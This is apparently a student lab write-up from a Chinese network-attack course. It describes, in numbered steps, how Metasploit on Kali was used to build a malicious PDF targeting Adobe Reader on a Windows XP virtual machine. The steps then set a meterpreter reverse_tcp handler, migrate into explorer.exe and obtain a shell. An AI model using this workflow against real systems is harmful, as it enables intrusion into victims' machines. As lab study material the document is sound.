20145329 《网络对抗技术》客户端Adobe阅读器渗透攻击
2024-08-25 04:22:02
两台虚拟机:
kali ip:192.168.96.130
windows xp sp3 ip:192.168.96.133
1.kali下打开显示隐藏文件
2.在kali终端中开启msfconsole。
3.进入该漏洞模块并设置攻击有效载荷
4.查看需要需要设置的数据,并设置相应的参数
5.查看设置的参数信息
6.打开exploit生成渗透攻击的pdf文件
7.将渗透文件发送到靶机,使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
8、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,并设置相关的端口、ip等信息,需要与之前生成渗透文件的设置一样
9.靶机打开pdf文件,攻击机启动exploit
10.sysinfo可以查看到靶机信息(忘了截图)
11.使用ps查看当前进程,并找到explorer.exe的进程号转移到改进程号,输入图shell,获取靶机的shell
最新文章
- 微信端应用 ionic实现texarea 自适应高度
- php 简单操作数据库
- mysql router 自动failover测试
- 一段代码说明javascript闭包执行机制
- Know Thy Complexities!
- [转]The Best Plugins for Sublime Text
- 微软Telnet的回显功能开启
- Python的集合和元组
- Nginx配置中的log_format用法梳理(设置详细的日志格式)
- ABP框架系列之三十四:(Multi-Tenancy-多租户)
- C语言 提取double的每一位
- UIProgressView进度条
- Spark机器学习(11):协同过滤算法
- Luogu P4071 [SDOI2016]排列计数
- 第9月第7天 uicollectionview
- 一条命令在Centos7中换163 yum源、安装python3并与python2共存、使用豆瓣pip源加速
- request.quest/query_string/params/body等方法介绍
- Oracle 导入导出SQL 查看登录用户表个数
- C# 快速排序--二分查找法--拉格朗日插值法
- linux 文件查找实用技巧
热门文章
- CCCC L2-022. 重排链表
- flume学习笔记
- Oracle安装部署之linux OS install oracle database安装脚本
- Catch That Cow--POJ3278
- requests爬取百度贴吧:python 美女 3
- sql server维护解决方案(备份、检查完整性、索引碎片整理)
- 全局ID的重要性
- 关hashMap跟hashTable的区别
- PAT 1068 Find More Coins[dp][难]
- PAT 1028 List Sorting[排序][一般]